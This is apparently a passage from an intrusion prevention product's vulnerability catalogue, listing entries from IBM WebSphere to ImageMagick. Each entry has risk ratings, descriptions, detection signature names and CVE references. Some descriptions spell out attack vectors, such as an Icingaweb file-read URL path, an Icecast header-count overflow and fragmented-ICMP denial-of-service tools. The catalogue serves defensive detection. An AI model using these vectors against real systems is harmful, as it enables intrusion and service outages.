Description: Improper validation of SIP messages leads to a vulnerability that can be exploited to cause a denial of service condition.
Situation: SIP-UDP_IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service
References:
CVE-2016-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2960
Back to top

IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization

About this vulnerability: A vulnerability in IBM WebSphere Application Server
Risk: Moderate
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM WebSphere Application Server
Type: Malfunction
Description: A malicious WASPostParam value containing serialized Java objects can be used to exploit the IBM WebSphere Application Server. Successful exploitation can allow arbitrary code execution on the target.
Situation: HTTP_CSH-IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization
References:
CVE-2016-5983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5983
Back to top

Icecast-Server-Base64-Authorization-Request-BOF

About this vulnerability: Buffer overflow in Icecast server base64 authorization
Risk: Moderate
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Icecast
Type: Buffer Overflow
Description: Icecast mp3 broadcasting server is vulnerable to a heap-based buffer overflow. By sending a specially-crafted base64 authorization request, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.
Situation: HTTP_CS-Icecast-Server-Base64-Authorization-BOF
References:
CVE-2004-2027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2027
BID-10311
http://www.securityfocus.com/bid/10311
OSVDB-6075
http://www.osvdb.org/6075
Back to top

Icecast-Server-HTTP-Header-BOF

About this vulnerability: Buffer overflow in Icecast streaming server
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Icecast
Type: Buffer Overflow
Description: Icecast mp3 streaming server versions 2.0.1 and prior running on Microsoft Windows are vulnerable to a buffer overflow, caused by improper bounds checking of user-supplied input when processing HTTP headers. By sending more than 31 headers in a HTTP request to Icecast, a remote attacker can overflow a buffer and execute arbitrary code on the system.
Situation: HTTP_CS-Icecast-Multiple-Header-Line-Buffer-Overflow
References:
CVE-2004-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1561
BID-11271
http://www.securityfocus.com/bid/11271
OSVDB-10446
http://www.osvdb.org/10446
Back to top

IcedID-Trojan-Infection-Traffic

About this vulnerability: IcedID trojan infection traffic
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: IcedID trojan infection traffic was detected. IcedID has information stealing capabilities and can also act as a dropper for other malware.
Situation: HTTP_CSH-IcedID-Trojan-Infection-Traffic
Back to top

Icingaweb-Directory-Traversal-In-Static-Library-File-Requests

About this vulnerability: A vulnerability in Icingaweb.
Risk: High
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Linux
Software: Icingaweb
Type: Input Validation
Description: A vulnerability in Icingaweb, versions 2.9.0 to 2.9.5, and 2.8.0 to 2.8.5, which allows remote attackers to retrieve arbitrary files from the targets filesystem via a GET request to /lib/icinga/icinga-php-thirdparty/<absolute path to target file on disk>.
Situation: HTTP_CRL-Icingaweb-Directory-Traversal-In-Static-Library-File-Requests
References:
CVE-2022-24716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24716
Back to top

ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification

About this vulnerability: A vulnerability in ICL ScadaFlex II SCADA Controllers.
Risk: High
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: ICL ScadaFlex
Type: Insecure Configuration
Description: A vulnerability in ICL ScadaFlex II SCADA Controllers SC-1/SC-2, version 1.03.07, which allows remote attackers to write, overwrite, or delete files on a target system which could lead to futher access, due to the lack of authentication.
Situation: HTTP_CS-ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification
References:
CVE-2022-25359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
Back to top

ICMP-Connection-Reset-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows 98; Windows ME; Windows XP; Windows 2003
Software: <os>
Type: Insecure Configuration
Description: There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection.
Situation: ICMP_Connection-Reset-Denial-Of-Service
References:
CVE-2004-0790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790
BID-13124
http://www.securityfocus.com/bid/13124
Back to top

ICMP-DoS-Jolt-Vulnerability

About this vulnerability: Framgented ICMP packet may cause Denial of Service
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Solaris; Linux
Software: <os>
Type: Malfunction
Description: A vulnerability in the handling of fragmented IP ICMP packets may cause the system to crash or become unavailable. The vulnerability exists in multiple operating systems including some versions of Linux, Solaris and Windows. Other operating systems may also be vulnerable. Attack tools (jolt, targa) to exploit this vulnerability are publicly available in the internet. See CVE-2002-107 and CVE-2002-0880 for related vulnerabilities.
Situation: DOS_JOLT
References:
CVE-1999-0345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0345
Back to top

ICMP-DoS-ZyXEL-Jolt-Vulnerability

About this vulnerability: Multiple Vendor Fragmented IP Packets DoS Vulnerability
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: ZyXEL Prestige
Type: Malfunction
Description: Transmitting identical fragmented jolt-style IP Packets to a ZyXEL Prestige device causes a Denial of Service. See also CVE-1999-0345.
Situation: DOS_JOLT
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Append-Command
References:
CVE-2002-1072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1072
BID-5292
http://www.securityfocus.com/bid/5292
Back to top

ICMP-Microsoft-Windows-Kernel-ICMP-Fragmented-Packet-DOS

About this vulnerability: Framgented ICMP packet may cause Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in the way Microsoft Windows Kernel processes ICMP requests. The vulnerability is due to insufficient boundary checking when processing fragmented router advertisement ICMP requests. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted ICMP messages to an affected system. Successful exploitation may cause the system to stop responding. By exploiting this vulnerability, the vulnerability will cause windows kernel panic and finally the vulnerable Windows system will crash to cause a denial of service condition. In such case, the target host must be restarted to resume its functionality.
Situation: IP_Fragment-Invalid-Size
References:
CVE-2007-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0066
BID-27139
http://www.securityfocus.com/bid/27139
MS08-001
http://technet.microsoft.com/security/bulletin/MS08-001
Back to top

ICMP-Source-Quench-Denial-Of-Service

About this vulnerability: A deprecated ICMP message type
Risk: Moderate
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: ICMP Source Quench was intended to be used to decrease the traffic rate of data in network streams. The method has been found ineffective and was deprecated as of RFC 6633 and can be considered as malicious.
Situation: ICMP_Source-Quench-Denial-Of-Service
References:
CVE-2004-0791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791
BID-13124
http://www.securityfocus.com/bid/13124
Back to top

iCMS-admincp.php-SQL-Injection

About this vulnerability: A vulnerability in iCMS
Risk: Moderate
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Generic
Software: iCMS
Type: Input Validation
Description: There exists an SQL injection vulnerability in iCMS version 7.0.8. Successful exploitation could lead in the execution of arbitrary SQL statements via a maliciously crafted request to admincp.php.
Situation: HTTP_CS-iCMS-admincp.php-SQL-Injection
References:
CVE-2018-12498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12498
Back to top

ICONICS-Dialog-Wrapper-Module-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in ICONICS Dialog Wrapper
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ICONICS Dialog Wrapper
Type: Malfunction
Description: There is a buffer overflow vulnerability the DlgWrapper.dll ActiveX control in ICONICS Dialog Wrapper which allows remote attackers to execute arbitrary code.
Situation: File-Text_ICONICS-Dialog-Wrapper-Module-ActiveX-Control--Overflow
References:
CVE-2006-6488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6488
BID-21849
http://www.securityfocus.com/bid/21849
OSVDB-32552
http://www.osvdb.org/32552
Back to top

ICONICS-Genesis-Denial-of-Service

About this vulnerability: A vulnerability in ICONICS Genesis
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ICONICS Genesis
Type: Malfunction
Description: An memory corruption vulnerability in Iconics GENESIS allows denial of service.
Situation: Generic_CS-ICONICS-Genesis-Denial-Of-Service
Back to top

ICONICS-Genesis-Integer-Overflow

About this vulnerability: A vulnerability in ICONICS Genesis
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ICONICS Genesis
Type: Integer Overflow
Description: An Integer Overflow vulnerability in Iconics GENESIS allows remote code execution.
Situation: Generic_CS-ICONICS-Genesis-Integer-Overflow
Back to top

ICONICS-Modbus-DoS

About this vulnerability: A vulnerability in Iconics OPC Modbus Ethernet Server
Risk: High
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Linux
Software: Modbus SCADA
Type: Malfunction
Description: A vulnerability exists in Iconics OPC Modbus Ethernet Server which allows for a DoS attack.
Situation: Generic_SS-ICONICS-Modbus-DoS
Back to top

ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in ICONICS WebHMI
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ICONICS WebHMI
Type: Buffer Overflow
Description: The ICONICS WebHMI ActiveX control is prone to a remote stack-based buffer-overflow vulnerability that affects the 'GenVersion.dll' ActiveX control. Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
Situation: File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability-2
References:
CVE-2011-2089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2089
BID-47704
http://www.securityfocus.com/bid/47704
OSVDB-72135
http://www.osvdb.org/72135
Back to top

Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961

About this vulnerability: An attempt to exploit a vulnerability in PHP detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the "ISO-2022-CN-EXT" character set. This may be used to crash an application or overwrite a neighbouring variable.
Situation: HTTP_CRL-Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961
References:
CVE-2024-2961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2961
Back to top

ICQ-Instant-Messenger-Network-Usage

About this vulnerability: ICQ instant messenger network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ICQ
Type: Instant Messenger
Description: ICQ is an instant messenger network that can be used to send messages and share files among users.
Situation: IM-TCP_ICQ-Network-Login
Back to top

ICSCADA-SQL-Injection

About this vulnerability: A vulnerability in ICSCADA
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ICSCADA
Type: SQL Injection
Description: There is an SQL injection vulnerability in ICSCADA.
Situation: HTTP_CRL-ICSCADA-SQL-Injection
Back to top

IDAutomation-Barcode-ActiveX-Components-File-Write

About this vulnerability: A vulnerability in IDAutomation Barcode ActiveX Components
Risk: High
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IDAutomation Barcode ActiveX
Type: Malfunction
Description: There is an arbitrary file write vulnerability in various IDAutomation Barcode ActiveX controls. The ActiveX component does not validate filename parameters in any way allowing a remote attacker to write files in the system as permitted by the privileges of the current user.
Situation: HTTP_SS-IDAutomation-Barcode-ActiveX-Components-File-Write
File-Text_IDAutomation-Barcode-ActiveX-Components-File-Write
References:
CVE-2008-2283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2283
BID-29204
http://www.securityfocus.com/bid/29204
Back to top

Ie-Cross-Domain-Frame-Spoof

About this vulnerability: Cross domain frame spoofing vulnerability in MS IE
Risk: Low
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 4.0; Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 5.5
Type: Malfunction
Description: Internet Explorer web browser has a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site. An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
Situation: File-GIF_Ie-Cross-Domain-Frame-Spoof
References:
CVE-2004-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0719
BID-855
http://www.securityfocus.com/bid/855
OSVDB-7296
http://www.osvdb.org/7296
Back to top

Ie-Object-Type-Property-BOF

About this vulnerability: Internet Explorer object type property buffer overflow
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A buffer overflow exists in the HTML-parser within some windows systems. This can be exploited via multiple attack vectors. A successful exploit leads remote compromise of the client.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow
References:
CVE-2003-0344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0344
BID-7806
http://www.securityfocus.com/bid/7806
OSVDB-2967
http://www.osvdb.org/2967
MS03-020
http://technet.microsoft.com/security/bulletin/MS03-020
Back to top

IEPlugin

About this vulnerability: IEPlugin browser plugin
Risk: Low
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IEPlugin
Type: Misconfiguration
Description: This browser plugin may be considered unwanted software by some organizations. It may display advertisement popups and/or send information to its company.
Situation: HTTP_CSH-IEPlugin
Back to top

IGEL-OS-Secure-VNC-Terminal-Command-Injection

About this vulnerability: A vulnerability in IGEL OS.
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: IGEL OS
Type: Input Validation
Description: A vulnerability in IGEL OS which allows remote attackers to execute arbitrary code through the Secure Terminal and Secure Shadow services.
Situation: Generic_CS-IGEL-OS-Secure-VNC-Terminal-Command-Injection
Back to top

Ignite-Realtime-OpenFire-Admin-Console-Authentication-Bypass

About this vulnerability: An Ignite Realtime OpenFire Admin Console Authentication Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Directory Traversal
Description: A vulnerability in Ignite Realtime Openfire, versions 3.6.0a and before, which allows remote attackers to read arbitrary files via a dot dot sequence directory traversal in a URI that matches the Exclude-Strings list.
References:
CVE-2008-6508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6508
BID-32189
http://www.securityfocus.com/bid/32189
OSVDB-49663
http://www.osvdb.org/49663
Back to top

Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting

About this vulnerability: A vulnerability in Ignite Realtime Openfire
Risk: Moderate
First detected in: sgpkg-ips-688-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Ignite Realtime Openfire Server. The vulnerability is due to insufficient validation of the "search" parameter within the group-summary.jsp page. By convincing an authenticated user to visit a malicious website, a remote attacker can exploit the XSS vulnerability to execute arbitrary scripts in the user's browser session with the security context of the affected server.
Situation: HTTP_CRL-Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting
References:
CVE-2015-6972
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6972
Back to top

Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Ignite Realtime Openfire
Risk: Moderate
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Input Validation
Description: A cross-site request forgery vulnerability has been reported in Openfire's server-props.jsp script. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrative privileges to visit a page which sends a request to server-props.jsp. Successful exploitation can result in attacker-controlled changes to server properties.
Situation: HTTP_CS-Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery
References:
CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973
Back to top

Ignite-Realtime-OpenFire-Server-XSS

About this vulnerability: A vulnerability in Ignite Realtime Openfire
Risk: Moderate
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Input Validation
Description: There is a cross-site scripting vulnerability in Ignite Realtime Openfire Server. By directing an administrator to a controlled website via the vulnerability, an attacker can exploit the cross-site scripting vulnerability for command execution in the user's browser.
Situation: HTTP_CRL-Ignite-Realtime-OpenFire-Server-XSS
Back to top

Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Ignite Realtime Openfire
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Input Validation
Description: A cross-site request forgery vulnerability has been reported in Openfire's user-create.jsp script. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrator privileges to visit a page which sends a request to user-create.jsp. Successful exploitation can result in adding arbitrary users.
Situation: HTTP_CS-Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery
References:
CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973
Back to top

Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Ignite Realtime Openfire
Risk: Moderate
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Input Validation
Description: A cross-site request forgery vulnerability has been reported in Openfire user-password.jsp. The vulnerability is due to insufficient CSRF protections. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user with administrative privileges to visit a page which sends a request to user-password.jsp. Successful exploitation can result in administrator password change.
Situation: HTTP_CS-Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery
References:
CVE-2015-6973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6973
Back to top

Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS

About this vulnerability: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Malfunction
Description: Ignite Realtime Openfire before 3.9.2 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Situation: HTTP_CRL-Ignite-Realtime-OpenFire-Version-3.7.1-Reflected-XSS
References:
CVE-2018-11688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11688
Back to top

IGSS-DataServer-Denial-Of-Service

About this vulnerability: IGSSdataServer.exe version 9.00.00.11063 and older denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IGSS Server
Type: Malfunction
Description: A vulnerability in IGSS DataServer that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-IGSS-DataServer-Denial-Of-Service
Back to top

IGSS-ODBC-Server-Denial-Of-Service

About this vulnerability: IGSS odbc scada server denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IGSS Server
Type: Malfunction
Description: A vulnerability in IGSS ODBC Server that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-IGSS-ODBC-Server-Denial-Of-Service
Back to top

IIS-Ftpd-Wildcard-Expansion-DoS

About this vulnerability: IIS ftpd wildcard expansion dos
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 5.0
Type: Resource Starvation
Description: A wildcard sequence that generates a long string when expanded may lead into resource starvation and thus into denial of service. Affected versions are ftp daemons in IIS 5.0 and before.
Situation: FTP_CS-IIS-DoS-Wildcard
References:
CVE-2001-0334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334
MS01-026
http://technet.microsoft.com/security/bulletin/MS01-026
Back to top

IIS-Iisadmpwd-DoS

About this vulnerability: IIS iisadmpwd Denial of Service (MS00-031)
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Insecure Configuration
Description: Microsoft IIS 4.0 and 5.0 allows changing a user's password. This can be exploited by sending a malformed password change request causing IIS to hang.
Situation: HTTP_CSU-IIS-Htr-File-Fragment-Disclosure
References:
CVE-2000-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0304
BID-1191
http://www.securityfocus.com/bid/1191
MS00-031
http://technet.microsoft.com/security/bulletin/MS00-031
Back to top

IIS-Isapi-Windows-Media-Services-BOF-MS03-019

About this vulnerability: MS03-019 Buffer overflow in ISAPI Extension for Windows Media Services
Risk: High
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS; Windows Media Services
Type: Buffer Overflow
Description: A buffer overflow in IIS ISAPI Extension for Windows Media Services allows remote attackers to execute arbitrary code.
Situation: HTTP_CS-IIS-Isapi-Windows-Media-Services-BOF-1
HTTP_CRL-IIS-Isapi-Windows-Media-Services-BOF-3
References:
CVE-2003-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0227
MS03-019
http://technet.microsoft.com/security/bulletin/MS03-019
Back to top

IIS-List-Argument-Heap-BOF

About this vulnerability: Heap buffer overflow vulnerability in LIST command argument handling
Risk: High
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Buffer Overflow
Description: A heap buffer overflow exists in some version of IIS. This can be triggered via sending a LIST/NLST command with overly long argument. Successful exploit may lead to remote admin compromise.
Situation: FTP_CS-Oversized-List-Argument-Buffer-Overflow
FTP_CS-Oversized-List-Argument
FTP_CS-IIS-Nlst-BOF
References:
CVE-1999-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0349
MS99-003
http://technet.microsoft.com/security/bulletin/MS99-003
Back to top

IIS-MS00-031-ISM-DLL-File-Disclosure

About this vulnerability: IIS ism.dll file disclosure (MS00-031)
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0
Type: Malfunction
Description: The ism.dll in unpatched IIS 4.0 and 5.0 allows remote attacker to read file contents by requesting the file with a URI that has multiple encoded spaces and a terminating .htr extension appended to a filename. A successful attack may leak information that can be used to initiate a more severe attack for a potential remote compromise.
References:
CVE-2000-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0457
BID-1193
http://www.securityfocus.com/bid/1193
MS00-031
http://technet.microsoft.com/security/bulletin/MS00-031
Back to top

IIS-Newdsn-Exe-Vulnerability

About this vulnerability: IIS newdsn.exe vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 3.0
Type: Metacharacter Injection
Description: Newdsn.exe is a sample script available in IIS 3 installations. This script has a vulnerability that allows remote command execution. The vulnerability is located in the parsing of special characters. A successful exploit leads to a remote compromise of the vulnerable host.
References:
CVE-1999-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191
BID-1818
http://www.securityfocus.com/bid/1818
OSVDB-275
http://www.osvdb.org/275
Back to top

IIS-RDS-Unsafe-Methods-Exposed

About this vulnerability: IIS unsafe methods exposed through RDS
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 3.0; IIS 4.0
Type: Insecure Configuration
Description: Microsoft IIS exposes unsafe functions through the Remote Data Service. An attacker may be able to run arbitary code with the IIS privileges by using these unsafe functions.
References:
CVE-1999-1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011
BID-529
http://www.securityfocus.com/bid/529
OSVDB-272
http://www.osvdb.org/272
MS99-025
http://technet.microsoft.com/security/bulletin/MS99-025
MS98-004
http://technet.microsoft.com/security/bulletin/MS98-004
Back to top

IIS-Showcode

About this vulnerability: IIS sample scripts allow viewing of files
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: IIS 4.0
Type: Directory Traversal
Description: Microsoft IIS provides several sample scripts to allow the user to view script files on the server. These sample scripts can be used to view other files on the system as well.
References:
CVE-1999-0736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0736
BID-167
http://www.securityfocus.com/bid/167
MS99-013
http://technet.microsoft.com/security/bulletin/MS99-013
Back to top

IIS-Upload-File-Exploit

About this vulnerability: IIS Upload File Exploit
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: There exists a vulnerability in IIS that allows a remote attacker to upload malicious files to the server.
Situation: HTTP_CSU-Possible-IIS-Upload-File-Exploit
References:
MS02-062
http://technet.microsoft.com/security/bulletin/MS02-062
Back to top

Illusion-Bot

About this vulnerability: Illusion Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Illusin is a Botnet that can be used for multiple malicious activities, such as Distrubuted Denial of Service (DDoS) attacks.
Situation: HTTP_CSU-Illusion-Bot-Activity
Back to top

IM-GAIM-ICQ-Protocol-Away-Message-BOF

About this vulnerability: Buffer overflow in GAIMs ICQ protocol away message handling
Risk: High
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GAIM
Type: Buffer Overflow
Description: GAIM, a multi-platform and multi-protocol instant messaging client, suffers from a buffer overflow in the handling of ICQ away messages. Special characters %d, %t and %n in an away message have a special meaning, and are expanded before they are displayed. GAIM stores uses a fixed buffer for the away message, which can be overflowed by including a large number of special characters in the message. The vulnerability is triggered when the specially-crafted away message is viewed, and allows arbitrary code execution. The attacker must be on the victims "buddy list" before the victim can view the malicious away message.
Situation: IM-TCP_GAIM-ICQ-Protocol-Away-Message-BOF
References:
CVE-2005-2103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103
BID-14531
http://www.securityfocus.com/bid/14531
Back to top

IM2Net-Peer-To-Peer-Network-Usage

About this vulnerability: IM2Net Peer-To-Peer Network usage
Risk: Moderate
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: iMesh
Type: Peer-to-Peer
Description: IM2NEt is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: HTTP_CSU-iMeshV8-Download
P2P-TCP_iMesh-Signin
P2P-TCP_iMesh-Peer-Access
Back to top

Imagemagick-Authenticate-Command-Injection

About this vulnerability: A vulnerability in ImageMagick Studio ImageMagick
Risk: High
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Imagemagick
Type: Input Validation
Description: A command injection vulnerability has been reported in ImageMagick. This vulnerability is due to improper validation of Authenticate tag in SVG image files. A remote, unauthenticated attacker can exploit this vulnerability by enticing an user to convert a malicious SVG file. Successful exploitation would result in arbitrary command execution under the security context of the user process.
Situation: File-TextId_Imagemagick-Authenticate-Command-Injection
Back to top

Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in ImageMagick Studio ImageMagick
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Input Validation
